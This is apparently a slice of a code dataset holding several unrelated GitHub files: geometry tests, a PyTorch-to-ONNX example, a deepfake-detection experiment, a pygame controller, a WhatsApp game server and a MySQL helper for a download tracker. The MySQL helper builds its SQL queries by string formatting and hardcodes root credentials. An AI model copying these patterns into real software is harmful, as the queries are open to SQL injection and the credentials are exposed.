\n xdiff = (linha_1[0][0] - linha_1[1][0], linha_2[0][0] - linha_2[1][0])\n ydiff = (linha_1[0][1] - linha_1[1][1], linha_2[0][1] - linha_2[1][1])\n\n def det(a, b):\n return a[0] * b[1] - a[1] * b[0]\n\n div = det(xdiff, ydiff)\n\n if div == 0:\n raise Exception('there is no intersection')\n\n d = (det(*linha_1), det(*linha_2))\n x = det(d, xdiff) / div\n y = det(d, ydiff) / div\n return x, y\n\n\ndef interseccao2(linha_1, linha_2):\n kx, ky = linha_1[0][0], linha_1[1][0]\n lx, ly = linha_2[0][0], linha_2[1][0]\n nx, ny = linha_1[0][1], linha_1[1][1]\n mx, my = linha_2[0][1], linha_2[1][1]\n det = (nx - mx) * (ly - ky) - (ny - my) * (lx - kx)\n print(det)\n\n if (det == 0.0):\n return 0\n # there is no intersection\n\n s = ((nx - mx) * (my - ky) - (ny - my) * (mx - kx)) / det\n # t = ((lx - kx) * (my - ky) - (ly - ky) * (mx - kx)) / det\n\n Pix = kx + (lx - kx) * s\n Piy = ky + (ly - ky) * s\n\n # Pix = mx + (nx - mx) * t\n # Piy = my + (ny - my) * t\n\n return Pix, Piy\n\n\n\"\"\"\n/* k : start point of line 1 */\n/* l : end point of line 1 */\n/* m : start point of line 2 */\n/* n : end point of line 2 \n\"\"\"\n\n\ndef test_ponto():\n assert ponto(x=6, y=7) == (6, 7)\n\n\ndef test_linha():\n ponto_a = ponto(x=2, y=4)\n ponto_b = ponto(x=4, y=4)\n assert linha(ponto_a, ponto_b) == [(2, 4), (4, 4)]\n\n\ndef test_intercessao():\n ponto_a = ponto(x=6, y=7)\n ponto_b = ponto(x=2, y=3)\n linha_1 = linha(ponto_a, ponto_b)\n\n ponto_c = ponto(x=2, y=4)\n ponto_d = ponto(x=8, y=4)\n linha_2 = linha(ponto_c, ponto_d)\n\n assert interseccao(linha_1, linha_2) == (3, 4)\n\n #assert interseccao2(linha_1, linha_2) == (3, 4)\n\n\nif __name__ == \"__main__\":\n pytest.main(['-svv', __file__])\n\"\"\"\nINPUT\na = (6,7)\nb = (2,3)\nc = (2,4)\nd = (8,4)\n\nOUTPUT: \ne = (3,4)\n\"\"\"\n\"\"\"\n 1 2 3 4 5 6\n-1*\n-2 *\n-3\n-4\n\nhttps://stackoverflow.com/questions/20677795/how-do-i-compute-the-intersection-point-of-two-lines\n\"\"\"\n","repo_name":"HBNetwork/coding-dojo","sub_path":"interseccao_de_segmentos_de_reta.py","file_name":"interseccao_de_segmentos_de_reta.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20885287589","text":"from etc import ops\nimport sys\n\n\ndef get_config(cfg_file) -> dict:\n \"\"\"\n Get tool configuration\n :param cfg_file: Configuration filename\n :return: config dict\n \"\"\"\n cfg = ops.load_yaml(cfg_file)\n if len(cfg.get('inventory_sources', '')) == 0:\n print(\"No inventory sources detected\")\n sys.exit(1)\n\n return cfg\n","repo_name":"aegiacometti/vlan_sync","sub_path":"etc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31823849873","text":"import sys\n\ndef find_min(arr):\n if arr is None:\n print('fatal error: input array should not be none', file=sys.stderr)\n return\n\n if not arr:\n return None\n\n min_number = arr[0]\n for num in arr:\n if num < min_number:\n min_number = num\n \n return min_number
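\n\n# quick sanity checks (illustrative): find_min([3, 1, 2]) == 1; find_min([]) is None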
\n\ndef helper():\n print(\"find_min(arr): it's a function to find out the minimal number in an array\")\n","repo_name":"COSC381-2020Fall/class-project-jpoeana1","sub_path":"pytest/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20402776850","text":"import torch\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass non_LR(torch.nn.Module):\n def __init__(self):\n super(non_LR, self).__init__()\n self.Dense1 = torch.nn.Linear(1, 32)\n self.Dense2 = torch.nn.Linear(32, 32)\n self.Dense3 = torch.nn.Linear(32, 16)\n self.Dense4 = torch.nn.Linear(16, 1)\n\n def forward(self, x):\n x= self.Dense1(x)\n x= F.relu(self.Dense2(x))\n x= F.relu(self.Dense3(x))\n out= self.Dense4(x)\n return out\n\n\nif __name__==\"__main__\":\n # Create noisy data:\n x_data = np.linspace(-10, 10, num=1000)\n y_data = 0.1*x_data*np.cos(x_data) + 0.1*np.random.normal(size=1000)\n print('Data created successfully')\n\n # data to torch tensors:\n X = torch.from_numpy(x_data.astype(np.float32))\n Y = torch.from_numpy(y_data.astype(np.float32))\n\n X = X.view(X.shape[0], 1)\n Y = Y.view(Y.shape[0], 1)\n\n print(X.shape, Y.shape)\n\n\n #---------------------------------------------------train---------------------------------------------\n #instantiate the model:\n model=non_LR()\n\n #loss function:\n criterion=torch.nn.MSELoss()\n\n #optimizer:\n optimizer=torch.optim.Adam(model.parameters(),lr=0.01)\n\n # 1000 training iterations:\n for i in range(1000):\n #predict:\n ypred=model(X)\n\n #loss:\n loss=criterion(ypred, Y)\n\n #back propagation:\n loss.backward()\n\n #optimizer step:\n optimizer.step()\n\n if i%10==0:\n print(\"epoch {} : loss {} \".format(i,loss))\n\n #reset gradients to zero\n optimizer.zero_grad()\n\n\n # Compute the output\n y_predicted = model(X).detach().numpy()\n\n print(y_predicted.shape)\n\n\n \"\"\"\n # Display the result\n plt.style.use('default')\n\n fig = plt.figure(figsize=(12, 4))\n\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122)\n\n ax1.scatter(x_data[::1], y_data[::1], s=2)\n ax1.set_title(\"data\")\n ax2.scatter(x_data[::1], y_data[::1], s=2)\n ax2.plot(x_data, y_predicted, 'r', linewidth=4)\n ax2.set_title(\"data prediction\")\n\n plt.grid()\n plt.ylim(top=1.2) # adjust the top leaving bottom unchanged\n plt.ylim(bottom=-1.2)\n\n #plt.savefig(\"../../images/non_LR.png\")\n\n plt.show()\n plt.clf()\"\"\"\n\n\n\n\n #-------------------------------------------------------save----------------------------------------\n #save model:\n #traced_script_module = torch.jit.trace(model,X)\n #torch.jit.save(traced_script_module,\"../models/non_LR_model.pt\")\n\n # Set the model to inference mode.\n model.eval()\n\n # Use the exporter from torch to convert to onnx\n # model (that has the weights and net arch)\n # Create some sample input in the shape this model expects\n dummy_input = torch.randn(10, 1, 1)\n\n # It's optional to label the input and output layers\n input_names = [ \"input\" ]\n output_names = [ \"output\" ]\n\n dynamic_axes=({'input' : {0 : 'batch_size'}, # variable length axes\n 'output' : {0 : 'batch_size'}})\n\n torch.onnx.export(\n model,\n dummy_input,\n \"non_LR_model.onnx\",\n verbose=True,\n input_names=input_names,\n output_names=output_names,\n dynamic_axes=dynamic_axes,\n )\n\n import onnxruntime\n import torch\n import torchvision.models as models\n import numpy as np\n\n ort_session = onnxruntime.InferenceSession(\"non_LR_model.onnx\")\n
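\n # onnxruntime consumes plain numpy arrays, so tensors are detached from the autograd graph first: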
tensor.requires_grad else tensor.cpu().numpy()\n\n\n x = torch.randn(40, 1, 1)\n # compute ONNX Runtime output prediction\n ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(x)}\n ort_outs = ort_session.run(None, ort_inputs)\n print(\"predicted output: \",ort_outs )\n\n\n","repo_name":"gratienj/dl_serialization","sub_path":"onnx/python/simplenets/non_LR.py","file_name":"non_LR.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24843159846","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nfilename: sql_module.py\n\nCreated on Sun Sep 22 23:24:39 2019\n\n@author: qjfoidnh\n\"\"\"\n\nimport pymysql\nfrom pymysql.err import IntegrityError\n\n\nclass MySQLconn_url(object):\n def __init__(self):\n\n self.conn = pymysql.connect(\n host='127.0.0.1',\n port=3307,\n user='root',\n password='bingo',\n database='comics_local',\n )\n self.conn.autocommit(True) # 开启自动提交,生产环境不建议数据库DBA这样做\n self.cursor = self.conn.cursor(cursor=pymysql.cursors.DictCursor)\n # 让MySQL以字典形式返回数据\n\n def __del__(self):\n\n self.conn.close()\n\n # 功能:取指定状态的一条数据\n def fetchoneurl(self, mode=\"pending\", tabname='comic_urls'):\n\n sql = \"SELECT * FROM %s \\\n WHERE status = '%s'\" % (tabname, mode)\n self.conn.ping(True) # mysql长连接防止timeut自动断开\n try:\n self.cursor.execute(sql)\n except Exception as e:\n return e\n else:\n item = self.cursor.fetchone()\n if not item:\n return None\n if mode == \"pending\" or mode == 'aria2':\n if item['checktimes'] < 3:\n sql = \"UPDATE %s SET starttime = now(), status = 'ongoing' WHERE id = %d\" % (tabname, item['id'])\n #print()\n else:\n sql = \"UPDATE %s SET status = 'error' \\\n WHERE id = %d\" % (tabname, item['id'])\n if mode == 'aria2':\n sql = \"UPDATE %s SET status = 'pending', checktimes = 0, raw_address=CONCAT('chmode',raw_address) \\\n WHERE id = %d\" % (tabname, item['id'])\n self.cursor.execute(sql)\n return 'toomany'\n elif mode == \"except\":\n sql = \"UPDATE %s SET status = 'ongoing' \\\n WHERE id = %d\" % (tabname, item['id'])\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return item\n\n # 功能:更新指定id条目的状态字段\n def updateurl(self, itemid, status='finished', tabname='comic_urls'):\n sql = \"UPDATE %s SET endtime = now(),status = '%s' WHERE id = %d\" % (tabname, status, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return itemid\n\n # 功能:更新指定id条目状态及重试次数字段\n def reseturl(self, itemid, mode, count=0, tabname='comic_urls'):\n\n sql = \"UPDATE %s SET status = '%s', checktimes=checktimes+%d WHERE id = %d\" % (tabname, mode, count, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n print(e)\n self.conn.rollback()\n return e\n else:\n return itemid\n\n # 功能:将未下载完成图片的网址列表写入数据库,\n def fixunfinish(self, itemid, img_urls, filepaths, tabname='comic_urls'):\n\n img_urls = \"Š\".join(img_urls) # 用不常见拉丁字母做分隔符,避免真实地址中有分隔符导致错误分割\n filepaths = \"Š\".join(filepaths)\n sql = \"UPDATE %s SET failed_links = '%s', failed_paths = '%s', status='except' WHERE id = %d\" % (\n tabname, img_urls, filepaths, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return 0\n\n # 功能:在尝试完一次未完成补全后,更新未完成列表\n def resetunfinish(self, itemid, img_urls, filepaths, tabname='comic_urls'):\n failed_num = len(img_urls)\n if failed_num == 
0:\n sql = \"UPDATE %s SET failed_links = null, failed_paths = null, status = 'finished', endtime = now() WHERE id = %d\" % (\n tabname, itemid)\n else:\n img_urls = \"Š\".join(img_urls) # 用拉丁字母做分隔符,避免真实地址中有分隔符导致错误分割\n filepaths = \"Š\".join(filepaths)\n sql = \"UPDATE %s SET failed_links = '%s', failed_paths = '%s', status = 'except' WHERE id = %d\" % (\n tabname, img_urls, filepaths, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return failed_num\n\n # 功能:为条目补上资源名称\n def addcomicname(self, address, title, tabname='comic_urls'):\n sql = \"UPDATE %s SET comic_name = '%s' WHERE raw_address = '%s'\" % (\n tabname, title, address) # 由于调用地点处没有id值,所以这里用address定位。也是本项目中唯二处用address定位的\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except IntegrityError:\n self.conn.rollback()\n sql_sk = \"UPDATE %s SET status = 'skipped' \\\n WHERE raw_address = '%s'\" % (tabname, address)\n self.cursor.execute(sql_sk)\n return Exception(title + \" Already downloaded!\")\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return 0\n\n # 功能:通过网址查询标识Aria2里对应的gid\n def fetchonegid(self, address, tabname='comic_urls'):\n sql = \"SELECT * FROM %s \\\n WHERE raw_address = '%s'\" % (tabname, address)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n return e\n else:\n item = self.cursor.fetchone()\n if not item:\n return None\n else:\n return item.get('oldpage')\n\n\nmq = MySQLconn_url()\n","repo_name":"bingoHua/SpiderForSukebei","sub_path":"sql_module.py","file_name":"sql_module.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38204457100","text":"#\n# Social Video Verification\n# Harman Suri, Eleanor Tursman\n# Brown University, 2020\n#\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.covariance import MinCovDet\nfrom scipy.cluster.hierarchy import linkage, fcluster\nimport matplotlib.pyplot as plt\n\ndef mahalanobis_calculate(data, num_pcs):\n pca = PCA(num_pcs)\n T = pca.fit_transform(StandardScaler().fit_transform(data))\n # fit a Minimum Covariance Determinant (MCD) robust estimator to data \n robust_cov = MinCovDet().fit(T)\n # Get the Mahalanobis distance\n m = robust_cov.mahalanobis(T)\n return m\n\ndef detectFakesTree(link, thresh):\n ratio = link[-1][-2] / link[-2][-2]\n if ratio > thresh:\n c = fcluster(link, 2,criterion='maxclust')\n partition1 = len(np.argwhere(c==1))\n partition2 = len(np.argwhere(c==2))\n if (partition1 > partition2):\n numFakes = partition2\n else:\n numFakes = partition1\n else:\n numFakes = 0\n c = 0\n return numFakes, c\n\n\ndef onlyPCA(cam1, cam2, cam3, cam4, cam5, cam6, fake2, \n fake3, fake4, start, end, num_pcs, thresh):\n \n cam1Out = mahalanobis_calculate(cam1[start:end,:], num_pcs)\n cam2Out = mahalanobis_calculate(cam2[start:end,:], num_pcs)\n cam3Out = mahalanobis_calculate(cam3[start:end,:], num_pcs)\n cam4Out = mahalanobis_calculate(cam4[start:end,:], num_pcs)\n cam5Out = mahalanobis_calculate(cam5[start:end,:], num_pcs)\n cam6Out = mahalanobis_calculate(cam6[start:end,:], num_pcs)\n \n camFake1 = mahalanobis_calculate(fake2[start:end,:], num_pcs)\n camFake2 = mahalanobis_calculate(fake3[start:end,:], num_pcs)\n camFake3 = 
mahalanobis_calculate(fake4[start:end,:], num_pcs)\n \n X0 = np.array([cam1Out, cam2Out, cam3Out, cam4Out, cam5Out, cam6Out])\n X1 = np.array([cam1Out, cam2Out, cam3Out, camFake3, cam5Out, cam6Out])\n X2 = np.array([cam1Out, cam2Out, camFake2, camFake3, cam5Out, cam6Out])\n X3 = np.array([cam1Out, camFake1, camFake2, camFake3, cam5Out, cam6Out])\n \n #Test for tracking failures and remove\n badInds = []\n \n for i, row in enumerate(X0.T):\n if np.max(row) >= 10:\n badInds.append(i)\n \n X0 = np.delete(X0, badInds, axis = 1)\n X1 = np.delete(X1, badInds, axis = 1)\n X2 = np.delete(X2, badInds, axis = 1)\n X3 = np.delete(X3, badInds, axis = 1)\n \n link0 = linkage(X0)\n link1 = linkage(X1)\n link2 = linkage(X2)\n link3 = linkage(X3)\n \n numFakes0, _ = detectFakesTree(link0, thresh)\n numFakes1, c1 = detectFakesTree(link1, thresh)\n numFakes2, c2 = detectFakesTree(link2, thresh)\n numFakes3, c3 = detectFakesTree(link3, thresh)\n \n return numFakes0, numFakes1, numFakes2, numFakes3, c1, c2, c3\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='DeepFake Detection Experiment')\n\n parser.add_argument('--data-dir', type=str, default='Data',\n help='Directory where processed landmark files live')\n parser.add_argument('--num_pcs', type=int, default=5,\n help='Number of principal components to use')\n parser.add_argument('--num_participants', type=int, default=1,\n help='Number of participants')\n parser.add_argument('--save-dir', type=str, default='results',\n help='Directory to save results')\n parser.add_argument('--rocOn', action = 'store_false')\n parser.add_argument('--roc-window-size', type=int, default=250, help = \"Window size to use when generating ROC curve\")\n parser.add_argument('--acc-threshold', type=float, default=1.3, help = \"Threshold to use when generating ACC curve\")\n parser.add_argument('--accOn', action = 'store_false')\n parser.add_argument(\"--thresholds\", nargs=\"+\", default=[1.3,1.5])\n parser.add_argument(\"--window-sizes\", nargs=\"+\", default=[200,250])\n \n \n args = parser.parse_args()\n return args\n\n\n\ndef main():\n \n #This experiment will take a LONG time to run for all participants. \n #Running it for 1 participant takes a bit over an hour. 
\n \n args = parse_args()\n \n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n \n threshNum = len(args.thresholds)\n if args.num_participants >= 17:\n n = args.num_participants - 1\n else:\n n = args.num_participants\n \n if args.rocOn:\n tpResults = np.zeros((threshNum,3,n))\n fpResults = np.zeros((threshNum,3,n))\n \n if args.accOn:\n accResults = np.zeros((4,len(args.window_sizes),n))\n \n \n for i in range(args.num_participants):\n if i == 16:\n continue\n \n if i > 16:\n person = i -1\n else:\n person = i\n \n if args.accOn:\n accs = np.zeros((4, len(args.window_sizes)))\n \n data2 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake2-ID{i+1}.mat'))\n data3 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake3-ID{i+1}.mat'))\n data4 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake4-ID{i+1}.mat'))\n \n fullLen = min(data2['cam1'].shape[0], data3['cam1'].shape[0], data4['cam1'].shape[0])\n \n cam1 = data3['cam1'][:fullLen,:]\n cam2 = data3['cam2'][:fullLen,:]\n cam3 = data3['cam3'][:fullLen,:]\n cam4 = data3['cam4'][:fullLen,:]\n cam5 = data3['cam5'][:fullLen,:]\n cam6 = data3['cam6'][:fullLen,:]\n \n #split into thirds (fake, real, fake)\n intervalWin = fullLen // 3\n fake2 = np.vstack([data2['fake'][:intervalWin,:], \n cam2[intervalWin:(2*intervalWin),:], \n data2['fake'][(2*intervalWin):fullLen,:]])\n fake3 = np.vstack([data3['fake'][:intervalWin,:], \n cam3[intervalWin:(2*intervalWin),:], \n data3['fake'][(2*intervalWin):fullLen,:]])\n fake4 = np.vstack([data4['fake'][:intervalWin,:], \n cam4[intervalWin:(2*intervalWin),:], \n data4['fake'][(2*intervalWin):fullLen,:]])\n \n \n #Iterate over different thresholds and window sizes\n threshes = args.thresholds\n window_sizes = args.window_sizes\n \n \n# =============================================================================\n# (1) TP if window contains a faked frame & fake is detected\n# (2) TN if window does not have fake & fake is not detected\n# (3) FP if window does not have fake & fake is detected\n# (4) FN if window contains a faked frame & fake is not detected\n# =============================================================================\n \n for ind, t in enumerate(threshes):\n for ind2, j in enumerate(window_sizes):\n numWin = fullLen - j\n # one accumulator per scenario; a chained assignment (acc0 = acc1 = acc2 = acc3 = np.zeros(...)) would make all four names alias the same array\n acc0 = np.zeros((4,numWin))\n acc1 = np.zeros((4,numWin))\n acc2 = np.zeros((4,numWin))\n acc3 = np.zeros((4,numWin))\n for start in range(fullLen):\n end = start + j\n if end > fullLen-1:\n continue\n \n numFakes0, numFakes1, numFakes2, numFakes3, c1, c2, c3 = onlyPCA(cam1, cam2, cam3, cam4, cam5, cam6, fake2, \n fake3, fake4, start, end, args.num_pcs, t)\n \n isFake = (len(set(range(start, end)).intersection(set(range(intervalWin, 2*intervalWin)))) == 0)\n \n #0 fakes case\n if numFakes0 ==0:\n acc0[1][start] = 1 \n else:\n acc0[2][start] = 1\n \n \n #1 fake case\n if numFakes1 ==1:\n if isFake==0:\n acc1[2][start] = 1\n else:\n if (np.all(c1 == np.array([1,1,1,2,1,1])) or np.all(c1 == np.array([2,2,2,1,2,2]))):\n acc1[0][start] = 1\n else:\n acc1[3][start] = 1\n elif numFakes1 > 1:\n acc1[2][start] = 1\n else:\n if isFake == 0:\n acc1[1][start] = 1\n else:\n acc1[3][start] = 1\n \n #2 fakes case\n if numFakes2 ==2:\n if isFake==0:\n acc2[2][start] = 1\n else:\n if (np.all(c2 == np.array([1,1,2,2,1,1])) or np.all(c2 == np.array([2,2,1,1,2,2]))):\n acc2[0][start] = 1\n else:\n acc2[3][start] = 1\n elif ((numFakes2 == 1) or (numFakes2 > 2)):\n acc2[2][start] = 1\n else:\n if isFake == 0:\n acc2[1][start] = 1\n else:\n acc2[3][start] = 1\n \n #3 fakes case\n \n if numFakes3 ==3:\n if isFake==0:\n acc3[2][start] = 1\n else:\n if (np.all(c3 == np.array([1,2,2,2,1,1])) or np.all(c3 == np.array([2,1,1,1,2,2]))):\n acc3[0][start] = 1\n else:\n acc3[3][start] = 1\n elif ((numFakes3 == 1) or (numFakes3 == 2) or (numFakes3 > 3)):\n acc3[2][start] = 1\n else:\n if isFake == 0:\n acc3[1][start] = 1\n else:\n acc3[3][start] = 1\n \n print(f'Window Start: {start}')\n \n # each np.mean(accK, axis=1) is the [TP, TN, FP, FN] rate vector for the K-fakes scenario\n print(f'ID: {i}. Threshold: {t}. Window size: {j}. '\n f'[TP, TN, FP, FN] rates -- 0 fakes: {np.mean(acc0, axis = 1)}. 1 fake: {np.mean(acc1, axis = 1)}. '\n f'2 fakes: {np.mean(acc2, axis = 1)}. 3 fakes: {np.mean(acc3, axis = 1)}.')\n \n if (args.rocOn and j == args.roc_window_size):\n tpResults[ind,0,person] = np.sum(acc1[0,:]) / (np.sum(acc1[0,:]) + np.sum(acc1[3,:]) + 1e-7)\n tpResults[ind,1,person] = np.sum(acc2[0,:]) / (np.sum(acc2[0,:]) + np.sum(acc2[3,:]) + 1e-7)\n tpResults[ind,2,person] = np.sum(acc3[0,:]) / (np.sum(acc3[0,:]) + np.sum(acc3[3,:]) + 1e-7)\n \n fpResults[ind,0,person] = np.sum(acc1[2,:]) / (np.sum(acc1[2,:]) + np.sum(acc1[1,:]) +1e-7)\n fpResults[ind,1,person] = np.sum(acc2[2,:]) / (np.sum(acc2[2,:]) + np.sum(acc2[1,:])+ 1e-7)\n fpResults[ind,2,person] = np.sum(acc3[2,:]) / (np.sum(acc3[2,:]) + np.sum(acc3[1,:])+ 1e-7)\n\n if (args.accOn and t == args.acc_threshold):\n \n accs[0,ind2] = (np.sum(acc0[0,:]) + np.sum(acc0[1,:])) / (np.sum(acc0[0,:]) + np.sum(acc0[1,:]) + np.sum(acc0[2,:]) + np.sum(acc0[3,:]))\n accs[1,ind2] = (np.sum(acc1[0,:]) + np.sum(acc1[1,:])) / (np.sum(acc1[0,:]) + np.sum(acc1[1,:]) + np.sum(acc1[2,:]) + np.sum(acc1[3,:]))\n accs[2,ind2] = (np.sum(acc2[0,:]) + np.sum(acc2[1,:])) / (np.sum(acc2[0,:]) + np.sum(acc2[1,:]) + np.sum(acc2[2,:]) + np.sum(acc2[3,:]))\n accs[3,ind2] = (np.sum(acc3[0,:]) + np.sum(acc3[1,:])) / (np.sum(acc3[0,:]) + np.sum(acc3[1,:]) + np.sum(acc3[2,:]) + np.sum(acc3[3,:]))\n \n if args.accOn:\n accResults[:,:,person] = accs\n \n if args.rocOn:\n meanTP = np.mean(tpResults, axis = 2) \n meanFP = np.mean(fpResults,axis = 2)\n stdTP = np.std(tpResults,axis = 2)\n stdFP = np.std(fpResults,axis = 2)\n \n oneFake = np.array([meanFP[:,0],meanTP[:,0] ])\n twoFake = np.array([meanFP[:,1],meanTP[:,1] ])\n threeFake = np.array([meanFP[:,2],meanTP[:,2] ])\n \n oneFake = oneFake[oneFake[:,1].argsort()]\n twoFake = twoFake[twoFake[:,1].argsort()]\n threeFake = threeFake[threeFake[:,1].argsort()]\n \n plt.errorbar(oneFake[:,0],oneFake[:,1], stdTP[:,0],stdFP[:,0], label = 'One Fake')\n plt.errorbar(twoFake[:,0],twoFake[:,1], stdTP[:,1],stdFP[:,1], label = 'Two Fakes')\n plt.errorbar(threeFake[:,0],threeFake[:,1], stdTP[:,2],stdFP[:,2], label = 'Three Fakes')\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.xlim([0,1])\n plt.ylim([0,1])\n plt.legend()\n plt.title(f\"ROC Curve. Window size = {args.roc_window_size}\")\n plt.savefig(os.path.join(args.save_dir, f\"roc_window_size_{args.roc_window_size}.jpg\"))\n \n \n if args.accOn:\n meanRes = np.mean(accResults,axis = 2)\n stdRes = np.std(accResults,axis = 2)\n \n plt.errorbar(args.window_sizes, meanRes[0,:], yerr = stdRes[0,:], label = \"No Fakes\")\n plt.errorbar(args.window_sizes, meanRes[1,:],yerr = stdRes[1,:], label = \"One Fake\")\n plt.errorbar(args.window_sizes, meanRes[2,:], yerr = stdRes[2,:],label = \"Two Fakes\")\n #plt.plot(args.window_sizes, meanRes[3,:], label = \"Three Fakes\")\n plt.xlim([min(args.window_sizes),max(args.window_sizes) + 50])\n plt.ylim([0,1])\n plt.xlabel(\"Window Size\")\n plt.ylabel(\"Accuracy\")\n plt.title(f\"Detection Accuracy vs. 
Window Size with Threshold = {args.acc_threshold}\")\n plt.legend()\n plt.savefig(os.path.join(args.save_dir, f\"acc_vs_window_size_thresh{args.acc_threshold}.jpg\"))\n \n \n\nif __name__ == \"__main__\":\n main()\n \n\n","repo_name":"brownvc/social-video-verification-hackathon","sub_path":"code/window_acc_exp.py","file_name":"window_acc_exp.py","file_ext":"py","file_size_in_byte":14158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17330299344","text":"# -*- coding: utf-8 -*-\nwhile True:\n s = 0\n qtde = 0\n while qtde < 2:\n n = float(input())\n if n<=10 and n>=0:\n s += n\n qtde += 1\n else:\n print(\"nota invalida\")\n print(\"media = %.2f\"%(s/2))\n denovo = 0\n while True:\n print(\"novo calculo (1-sim 2-nao)\")\n denovo = int(input())\n if denovo==1 or denovo==2:\n break\n if denovo==2:\n break\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1118.py","file_name":"1118.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73851874067","text":"import pygame\nimport sys\nfrom Game import Game\n\n\nclass Controller:\n def __init__(self, game: Game):\n self.game = game\n\n def get_and_handle_events(self):\n events = pygame.event.get()\n self.exit_if_time_to_quit(events)\n print(events) # Only for testing\n\n @staticmethod\n def exit_if_time_to_quit(events):\n for event in events:\n if event.type == pygame.QUIT:\n sys.exit()\n","repo_name":"RHIT-CSSE/csse120-public","sub_path":"PythonProjects-Archived/99c-Model-View-Controller-Example/Stage2/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11726044662","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom classes import SMSPlayer, show_phone_number\nfrom game_class import Game\nimport json\nimport random\nfrom whatsapp.commands import commands\nfrom whatsapp.whatsapp_manager import send_message, get_user\nfrom flask import Flask, request\nfrom threading import Thread\nimport os\nfrom utils import clear_frame, VerticalScrolledFrame\n\n\nclass WhatsAppGame(Game):\n def __init__(self, game_master: bool = None):\n self.receive = True\n self.send_messages = []\n self.server = app = Flask(__name__)\n # Start the NodeJs process to manage the whatsapp connection and get the logs from the process in a thread\n # Detect if there is a node_modules folder\n if not os.path.isdir(\"whatsapp/api/node_modules\"):\n print(\"Installation des dépendances de WhatsApp\")\n os.system(\"cd whatsapp/api && npm install\")\n self.whatsapp_manager = Thread(target=lambda: os.system(\"cd whatsapp/api && node index.js\"))\n self.whatsapp_manager.start()\n\n self.is_ready = False\n\n @app.post(\"/qr\")\n def qr():\n print(\"Please scan the QR code below to authenticate.\")\n return \"OK\", 200\n\n @app.post(\"/authenticated\")\n def authenticated():\n return \"OK\", 200\n\n @app.post(\"/auth_failure\")\n def auth_failure():\n return \"OK\", 200\n\n @app.post(\"/ready\")\n def ready():\n print(\"WhatsApp is ready\")\n if not self.pause: \n if self.import_window is not None:\n self.is_ready = True\n else: \n messagebox.showinfo(\"Bienvenue\", \"Bienvenue dans le jeu \" + self.config[\"names\"][\"title\"] + \"\\n\" +\n \"Une nouvelle partie va commencer.\\n\" +\n \"Êtes-vous prêt à 
jouer ?\")\n self.start_game()\n else:\n self.unpause_game()\n return \"OK\", 200\n\n @app.post(\"/message\")\n def message():\n data = request.json[\"data\"]\n if len(data[\"from\"]) > 16:\n return \"OK\", 200\n joueur = next((player for player in self.players if\n player.phone.replace(\"+\", \"\") == data[\"from\"].replace(\"@c.us\", \"\")), None)\n if self.import_window is not None:\n if self.register_code in data[\"body\"]:\n if joueur is not None:\n return self.send_info(joueur, \"Vous êtes déjà enregistré dans la partie !\")\n new_player = {\n \"type\": \"sms\",\n \"name\": data['_data']['notifyName'], \n \"phone\": f\"+{data['from'].replace('@c.us', '')}\",\n \"play\": True,\n }\n player = SMSPlayer(new_player[\"name\"], new_player[\"phone\"], self.used_passwords, self.used_id)\n self.players.append(player)\n if self.config[\"save_register\"]:\n \n players = []\n if os.path.exists(\"players.json\"):\n with open(\"players.json\", \"r\", encoding=\"utf-8\") as file:\n players = json.load(file)\n players.append(new_player)\n with open(\"players.json\", \"w\", encoding=\"utf-8\") as file:\n json.dump(players, file, indent=4, ensure_ascii=False)\n self.send_info(player, \"Vous êtes bien entré dans la partie !\")\n self.import_players()\n return True\n if len(data[\"from\"]) > 16:\n return \"OK\", 200\n joueur = next((player for player in self.players if\n player.phone.replace(\"+\", \"\") == data[\"from\"].replace(\"@c.us\", \"\")), None)\n if not self.check_command(joueur, data):\n string = \"Nouveau message de \" + 